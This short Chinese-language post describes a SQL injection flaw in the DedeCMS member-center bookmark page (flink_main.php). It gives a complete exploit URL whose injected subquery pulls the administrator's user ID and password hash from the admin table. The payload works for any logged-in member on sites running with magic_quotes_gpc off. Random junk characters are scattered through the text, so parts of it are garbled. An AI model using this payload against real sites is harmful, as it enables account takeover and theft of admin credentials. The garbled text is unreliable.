DedeCMS会员中心SQL注射漏洞
& ]2 ]: z2 }1 L9 ]& L需要magic_quotes_gpc = Off
( P0 y$ k' L" T会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
9 y7 s" l a3 U' t7 x2 h$ F
+ c% b/ {' _/ y7 W6 C8 GDedeCMS会员中心书签管理SQL注射漏洞1 h2 P4 C- F7 ~
成功利用该漏洞可获得管理员密码
0 ]# B# ?1 c/ i1 l( Y
# K; Z* e9 M9 c+ z+ @会员登录后可以执行SQL语句查询数据库任意内容如管理员密码- P( L4 t0 V+ g* o' ]2 m+ q6 `
8 E6 w$ V5 S$ |; H5 v: F
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r3 W/ y4 e9 I5 k' _& G& ?
|